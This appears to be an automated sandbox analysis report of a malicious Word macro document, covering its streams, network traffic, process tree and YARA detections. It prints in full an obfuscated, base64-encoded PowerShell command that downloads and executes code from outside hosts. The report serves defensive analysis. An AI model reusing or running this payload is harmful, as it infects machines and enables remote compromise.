            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5460
            General
            Stream Path:Macros/VBA/_VBA_PROJECT
            File Type:data
            Stream Size:5460
            Entropy:5.24158976541
            Base64 Encoded:False
            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
            Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
            General
            Stream Path:Macros/VBA/dir
            File Type:data
            Stream Size:513
            Entropy:6.24664802112
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . o ; ^ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
            Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 b9 6f 3b 5e 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
            Stream Path: MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Item, File Type: XML 1.0 document, ASCII text, with very long lines, with no line terminators, Stream Size: 306
            General
            Stream Path:MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Item
            File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
            Stream Size:306
            Entropy:5.08740844904
            Base64 Encoded:False
            Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > < b : S o u r c e s x m l n s : b = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " x m l n s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / b i b l i o g r a p h y " S e l e c t e d S t y l e = " \\ A P A S i x t h E d i t i o n O f f i c e O n
            Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 3c 62 3a 53 6f 75 72 63 65 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f 72 67 2f 6f 66 66 69 63 65 44 6f 63 75 6d 65 6e 74 2f 32 30 30 36 2f
            Stream Path: MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Properties, File Type: XML 1.0 document, ASCII text, with CRLF line terminators, Stream Size: 341
            General
            Stream Path:MsoDataStore/\x199Y\x213XGN\x206\x213\x195UKW\x219\x206IS2BK\x205\x208\x208==/Properties
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Stream Size:341
            Entropy:5.25175142912
            Base64 Encoded:True
            Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " U T F - 8 " s t a n d a l o n e = " n o " ? > . . < d s : d a t a s t o r e I t e m d s : i t e m I D = " { 1 8 5 7 8 D 9 D - B 5 D B - 4 2 8 D - 9 6 E E - E 2 1 2 7 0 1 2 A D C 3 } " x m l n s : d s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / o f f i c e D o c u m e n t / 2 0 0 6 / c u s t o m X m l " > < d s : s c h e m a R e f s > < d s : s c h e m a R e f d s : u r i = " h t t p : / / s c h e m a s . o p e n
            Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0d 0a 3c 64 73 3a 64 61 74 61 73 74 6f 72 65 49 74 65 6d 20 64 73 3a 69 74 65 6d 49 44 3d 22 7b 31 38 35 37 38 44 39 44 2d 42 35 44 42 2d 34 32 38 44 2d 39 36 45 45 2d 45 32 31 32 37 30 31 32 41 44 43 33 7d 22 20 78 6d 6c
            Stream Path: WordDocument, File Type: data, Stream Size: 4096
            General
            Stream Path:WordDocument
            File Type:data
            Stream Size:4096
            Entropy:1.31946833917
            Base64 Encoded:False
            Data ASCII:. . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x e . a x e . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:ec a5 c1 00 57 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 16 08 00 00 0e 00 62 6a 62 6a 1a 0f 1a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 78 65 fc 61 78 65 fc 61 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 12, 2021 20:55:02.622648954 CET4916580192.168.2.22176.32.35.16
            Nov 12, 2021 20:55:02.684305906 CET8049165176.32.35.16192.168.2.22
            Nov 12, 2021 20:55:02.684464931 CET4916580192.168.2.22176.32.35.16
            Nov 12, 2021 20:55:02.686345100 CET4916580192.168.2.22176.32.35.16
            Nov 12, 2021 20:55:02.745944977 CET8049165176.32.35.16192.168.2.22
            Nov 12, 2021 20:55:02.746126890 CET8049165176.32.35.16192.168.2.22
            Nov 12, 2021 20:55:02.780746937 CET4916580192.168.2.22176.32.35.16

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 12, 2021 20:55:02.478624105 CET5216753192.168.2.228.8.8.8
            Nov 12, 2021 20:55:02.587711096 CET53521678.8.8.8192.168.2.22

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Nov 12, 2021 20:55:02.478624105 CET192.168.2.228.8.8.80x24f0Standard query (0)fpetraardella.bandA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Nov 12, 2021 20:55:02.587711096 CET8.8.8.8192.168.2.220x24f0Name error (3)fpetraardella.bandnonenoneA (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • 176.32.35.16

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.2249165176.32.35.1680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampkBytes transferredDirectionData
            Nov 12, 2021 20:55:02.686345100 CET0OUTGET /704e.php HTTP/1.1
            Host: 176.32.35.16
            Connection: Keep-Alive
            Nov 12, 2021 20:55:02.746126890 CET0INHTTP/1.1 404 Not Found
            Server: nginx/1.16.1
            Date: Fri, 12 Nov 2021 19:55:02 GMT
            Content-Type: text/html
            Content-Length: 153
            Connection: keep-alive
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: WINWORD.EXE PID: 1532 Parent PID: 596

            General

            Start time:20:55:11
            Start date:12/11/2021
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f740000
            File size:1423704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: cmd.exe PID: 668 Parent PID: 1532

            General

            Start time:20:55:13
            Start date:12/11/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
            Imagebase:0x4aa10000
            File size:345088 bytes
            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp, Author: Florian Roth
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp, Author: Joe Security
            • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp, Author: Florian Roth
            Reputation:high

            Chronological Activities

            Analysis Process: powershell.exe PID: 2984 Parent PID: 668

            General

            Start time:20:55:14
            Start date:12/11/2021
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
            Imagebase:0x13f570000
            File size:473600 bytes
            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high

            Chronological Activities

            Disassembly

            Code Analysis

            VBA Code

            Call Graph

            Graph

            • Entrypoint
            • Decryption Function
            • Executed
            • Not Executed
            • Show Help
            callgraph 9 AutoOpen Replace:1,Len:78,Trim:43,LTrim:1,LenB:39, ChrW:78,RTrim:1

            Module: ThisDocument

            Declaration
            LineContent
            1

            Attribute VB_Name = "ThisDocument"

            2

            Attribute VB_Base = "1Normal.ThisDocument"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = True

            8

            Attribute VB_Customizable = True

            Executed Functions
            Subroutine AutoOpen, APIs: 283, Strings: 8, Number of lines: 50, Relevance: 668.05
            APIsMeta Information

            WifblkBfDS

            CBool

            Len

            		Len("\x0e\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            lZlRjJlQKnBntw

            pWNDRZbLZdGgl

            CBool

            Len

            		Len("\x02\x02") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            SxZnBTiJkRBD

            zTQlVkgJtJHVH

            CBool

            Len

            		Len(" ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            RRdTnGKKsvm

            bDhgcvpVdcXNV

            CBool

            Len

            		Len(" ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            hVXaKsWdqGRalHZ

            xHtTibzqdL

            CBool

            Len

            		Len(" \x01") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            aQkXvbNzGWvh

            PfFKPmwSmLwNT

            CBool

            Len

            		Len("\x0b\x06") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            jwrLSVvTGmNgSNh

            mFGCJxVWBXjkl

            CBool

            Len

            		Len("\x12\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            SWsFlrFhBaHlgGg

            qqmRcwgpqlk

            CBool

            Len

            		Len("\x03\x07") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            QdRJwGnCHinZ

            NfHHmGCha

            CBool

            Len

            		Len(" ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            jWwMxvjadBtl

            jdmzHVMkcVXcdMP

            CBool

            Len

            		Len("\x0c ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            irVHvSQQvHtd

            CNLqTtpWDztqK

            CBool

            Len

            		Len(" ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            RJaDmljLvpgjz

            vxPLFqFShhCqh

            CBool

            Len

            		Len("\x10\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            zzfDDCMbPXrM

            Trim

            fPSQKCwZHRJ

            CBool

            Len

            		Len("\x0f\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            dmfMtsadBraSX

            DVsGkQJsLPQCcZqt

            CBool

            Len

            		Len(" \x06") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            laLlSgkFRvtad

            aCwfgTJDmbRQW

            CBool

            Len

            		Len("\x13\x02") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            chdsMqJKtKM

            lFQtNLhczCraQG

            CBool

            Len

            		Len("\x0b\x06") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            KPgHQGtPqLTjphCn

            LTrim

            VPWjviWKBpJi

            CBool

            Len

            		Len(" \x08") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            nBDKwlZJvRMwRR

            qcmPmHlmdWZqj

            CBool

            Len

            		Len("\x0c\x01") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            crtmLCNraQLF

            rDZKxGvDrNBJ

            CBool

            Len

            		Len("\x10\x01") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            ptlCjjDiKZ

            hdJScJQgXmkm

            CBool

            Len

            		Len("\x0c ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            WfkDLfGhqhWfhTN

            TBWHlimLMV

            CBool

            Len

            		Len("\x11 ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            JHxRSZaqkRwtHi

            NsLSSSLGDfkwlt

            CBool

            Len

            		Len("\x0f\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            gJMqliiHCRNZQTc

            aBBZDWsTDPPnS

            CBool

            Len

            		Len(" \x04") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            KmpHBhFRwlKKMm

            wtDvZMrVDatsPG

            CBool

            Len

            		Len("\x07\x04") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            qlkRQRpBTtrm

            NKxZvdzbPWxxN

            CBool

            Len

            		Len("\x0e\x04") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            wKPlSJwvvXqW

            MpTBwVxXgdanm

            CBool

            Len

            		Len("\x04\x05") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            tlWSglqmcgHrcq

            RTrim

            sFdLzbirFimt

            CBool

            Len

            		Len(" \x08") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            acSnFqKQZJkgq

            mChrRcSmQTlzbtd

            CBool

            Len

            		Len(" ") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            iixsSRWTqT

            FracTilLgHn

            CBool

            Len

            		Len("\x0c\x07") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            igrKGJjKXXfr

            Shapes

            Trim

            iGKRcdzDwMZzqlWN

            CBool

            Len

            		Len("\x08\x04") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            mQhXDqaHVLMab

            jxrRCZTpPSjqG

            CBool

            Len

            		Len("\x0b\x03") -> 2 Len() -> 0

            ChrW

            LenB

            Trim

            HmbfaFbBPKWJstpW

            Shell#

            Trim

            Replace

